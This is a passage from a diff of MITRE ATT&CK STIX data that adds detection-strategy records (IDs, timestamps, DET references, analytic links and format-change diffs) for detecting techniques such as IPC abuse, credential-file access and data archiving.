+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b38e114c-f00f-4c70-9623-267da801625a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0493",
+                            "external_id": "DET0493"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of Inter-Process Communication (T1559)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0c6a8e7a-f9d0-479a-88c1-4ce26edba81c",
+                        "x-mitre-analytic--ae8e028c-2c3a-4ac0-964f-d0b59533190d",
+                        "x-mitre-analytic--3f42390d-2a44-4094-9cea-429f1286f8aa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9c4b0b07-df7f-4697-8cd1-0b95ff6a6361",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0122",
+                            "external_id": "DET0122"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of Windows Time Providers for Persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c223f997-8323-40c2-98c9-38a8a1779db4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a92f4b5f-9d0d-461f-8581-a50975f5e07a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0335",
+                            "external_id": "DET0335"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of XPC Services (T1559.003)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a8284241-0d8e-42da-b86d-48f0d660df6c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--000d7b6f-0bb5-4144-a3eb-1aa822433da1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0535",
+                            "external_id": "DET0535"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of vSphere Installation Bundles (VIBs) for Persistent Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9696a221-35b9-4576-ae75-714c902c2889"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--69b08c7a-c2ab-4e56-935d-ec28143372de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0381",
+                            "external_id": "DET0381"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access and Decryption of Group Policy Preference (GPP) Credentials in SYSVOL",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e14e67af-6f6e-47d6-aa19-4012ea99284c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--653b555a-590f-40e4-9400-f14d0ed92252",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0385",
+                            "external_id": "DET0385"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access and Parsing of .bash_history Files for Credential Harvesting",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--12be6c5f-213a-464f-b780-ac06f20ab763",
+                        "x-mitre-analytic--ead38dff-ee26-477d-be5a-69b52dc8bd50"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d1912fbc-aaac-4bb1-82f1-0713280ca9a1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0412",
+                            "external_id": "DET0412"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access or Search for Unsecured Credentials Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d76081f4-26cd-4e62-91e8-4e4a3992dd90",
+                        "x-mitre-analytic--27213df4-c761-4745-b8ef-f91a46966eb9",
+                        "x-mitre-analytic--49897e8e-8d14-4fcb-b305-328d44e58f35",
+                        "x-mitre-analytic--0ec40b2f-4969-443f-bad5-4bc6239fec29",
+                        "x-mitre-analytic--3e30007c-fc51-447f-850a-c8378427be3d",
+                        "x-mitre-analytic--1a68a39c-c4e3-4ff1-88f5-db78575ce15e",
+                        "x-mitre-analytic--badcc199-683b-41f5-9522-9710969cff15"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6182825d-f41f-4d87-ac93-937f7894ab1d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0001",
+                            "external_id": "DET0001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access to Cloud Instance Metadata API (IaaS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f4af0b1b-db51-4266-8b02-2cdfcb191f60"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b34a9911-8261-45b4-af09-3885f9b82cc6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0307",
+                            "external_id": "DET0307"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access to Unsecured Credential Files Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0277e29a-af6d-4242-a187-32673328664a",
+                        "x-mitre-analytic--7ff5d08a-5d4d-4260-85ee-fdb6a244f258",
+                        "x-mitre-analytic--df289d0f-0f31-487e-b213-9a492d903f2c",
+                        "x-mitre-analytic--9c5d279c-eb09-4592-91a4-8cf6436522b6",
+                        "x-mitre-analytic--01d19202-019e-43c9-a5e9-e1e2a38eb738"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cc6c18b5-1fa6-4e27-8c78-e479428bef44",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0396",
+                            "external_id": "DET0396"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Access to macOS Keychain for Credential Theft",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--015260e0-432e-4eaf-978e-b1a32fa6af6a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ba8d3a5d-9ddc-4301-b021-84ca2c6854de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0312",
+                            "external_id": "DET0312"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Active Setup Persistence via StubPath Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0be2ac94-5f56-4bdc-bf07-ec9ea08c8bb7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5b3bf2de-d91e-4272-97a8-5df6f4071e45",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0275",
+                            "external_id": "DET0275"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Adversary Deobfuscation or Decoding of Files and Payloads",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--75f05a04-103c-432a-afd6-8a8987b4370e",
+                        "x-mitre-analytic--c4866ad5-310c-4a72-89b5-1e5a8683d286",
+                        "x-mitre-analytic--0029e7e7-d42c-4a91-8d00-6bf6fd72962f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0eb48c77-9056-4178-900b-7ac23fd1c7cd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0296",
+                            "external_id": "DET0296"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Adversary-in-the-Middle via Network and Configuration Anomalies",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c15f60a8-6e58-460f-8dcf-1bce272b5eaf",
+                        "x-mitre-analytic--3cdef7d3-4ca6-4d4a-933b-656af73f8433",
+                        "x-mitre-analytic--7535f2e7-d7bb-4e92-8a63-36cd9ccc01be",
+                        "x-mitre-analytic--bb3daf14-f237-4688-a319-a4d7570e407e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--043bc738-1f07-4d28-9f5c-1b1f81525e7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0526",
+                            "external_id": "DET0526"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Archiving and Encryption of Collected Data (T1560)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--eaeb2a44-eebe-41f3-875a-a34abdc03252",
+                        "x-mitre-analytic--8018e3a6-ab64-4fe2-9771-ca129091bc17",
+                        "x-mitre-analytic--0f4789c9-7946-473f-967b-e8ca59fa3c8c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--edf894b7-052a-4baf-8984-f01ec773c80c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0438",
+                            "external_id": "DET0438"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Archiving via Custom Method (T1560.003)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3f47f3e9-2856-4830-9762-7ca0c3924f6d",
+                        "x-mitre-analytic--32ca8e2c-9c1e-4883-aa98-439efbfc76e4",
+                        "x-mitre-analytic--1a39005f-28e7-4b07-85e2-14ffa0f6ea3b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a3dcb195-d1b5-4bce-b62b-ba9bdaed56d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0268",
+                            "external_id": "DET0268"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Archiving via Library (T1560.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4bdc0555-f7f0-4b5b-80c9-77f361881a01",
+                        "x-mitre-analytic--90e51090-9857-4a28-98b9-f21401ddbe85",
+                        "x-mitre-analytic--4ecd8727-bcf3-4fce-8c04-e8d0bad1267e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e8528ab8-3467-423b-92b6-115f8ecc266d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0298",
+                            "external_id": "DET0298"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Archiving via Utility (T1560.001)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ebfa3aa8-dc7c-4d56-868e-169c873b5e78",
